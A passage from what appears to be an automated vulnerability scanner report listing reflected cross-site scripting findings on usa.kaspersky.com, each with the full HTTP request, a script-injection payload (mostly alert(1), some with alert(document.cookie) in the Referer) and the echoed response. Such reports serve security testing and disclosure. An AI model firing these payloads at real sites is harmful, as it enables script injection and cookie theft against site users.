Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 12:59:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045186"
Content-Type: text/html; charset=utf-8
Content-Length: 53136
Date: Sun, 17 Apr 2011 12:59:48 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads?213ed"><script>alert(1)</script>2b51f9931de=1" />
...[SNIP]...

4.55. http://usa.kaspersky.com/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b646"><script>alert(1)</script>ae9adfd699b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html6b646"><script>alert(1)</script>ae9adfd699b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045517"
Content-Type: text/html; charset=utf-8
Content-Length: 30304
Date: Sun, 17 Apr 2011 13:05:19 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html6b646"><script>alert(1)</script>ae9adfd699b" />
...[SNIP]...

4.56. http://usa.kaspersky.com/index.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32ac5"-alert(1)-"a94f7d736ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html32ac5"-alert(1)-"a94f7d736ee HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045522"
Content-Type: text/html; charset=utf-8
Content-Length: 30208
Date: Sun, 17 Apr 2011 13:05:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
) { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html32ac5"-alert(1)-"a94f7d736ee";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.57. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>aa7cd075570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?487ba"><script>alert(1)</script>aa7cd075570=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045508"
Content-Type: text/html; charset=utf-8
Content-Length: 34850
Date: Sun, 17 Apr 2011 13:05:10 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/index.html?487ba"><script>alert(1)</script>aa7cd075570=1" />
...[SNIP]...

4.58. http://usa.kaspersky.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a7d0"-alert(1)-"126d375c027 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?1a7d0"-alert(1)-"126d375c027=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; s_nr=1303045178067-New; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; evar7=kav_rescue_10.iso; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:05:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045514"
Content-Type: text/html; charset=utf-8
Content-Length: 34770
Date: Sun, 17 Apr 2011 13:05:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
{ s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/index.html?1a7d0"-alert(1)-"126d375c027=1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.59. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5bd2"-alert(1)-"a64730ff9f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046599"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:21 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/searchb5bd2"-alert(1)-"a64730ff9f0/search.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.60. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b76"><script>alert(1)</script>9e28f61214c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046595"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:17 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search34b76"><script>alert(1)</script>9e28f61214c/search.css?D" />
...[SNIP]...

4.61. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73b4"><script>alert(1)</script>7c4d80f2788 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046604"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sun, 17 Apr 2011 13:23:26 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/modules/search/search.cssf73b4"><script>alert(1)</script>7c4d80f2788?D" />
...[SNIP]...

4.62. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /modules/search/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d413"-alert(1)-"5ca6375d2ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/index.html6b646%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae9adfd699b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:23:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303046608"
Content-Type: text/html; charset=utf-8
Content-Length: 30329
Date: Sun, 17 Apr 2011 13:23:29 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/modules/search/search.css8d413"-alert(1)-"5ca6375d2ca?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.63. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2010a"><script>alert(1)</script>7da5ccb57fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:25 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045225"
Content-Type: text/html; charset=utf-8
Content-Length: 30365
Date: Sun, 17 Apr 2011 13:00:27 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/2010a"><script>alert(1)</script>7da5ccb57fe" />
...[SNIP]...

4.64. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61fec</script><script>alert(1)</script>a37e498334b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/61fec</script><script>alert(1)</script>a37e498334b HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); evar7=kav_rescue_10.iso; s_cc=true; gpv_pageName=Downloads; s_nr=1303045178067-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA; __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.2.10.1303044891; s_vi=[CS]v1|26D5721C85078BD0-60000103C002991F[CE]

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045242"
Content-Type: text/html; charset=utf-8
Content-Length: 30405
Date: Sun, 17 Apr 2011 13:00:44 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 981ec"-alert(1)-"965c4b42b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045228"
Content-Type: text/html; charset=utf-8
Content-Length: 30366
Date: Sun, 17 Apr 2011 13:00:30 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6ac6"><script>alert(1)</script>480844bb7c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
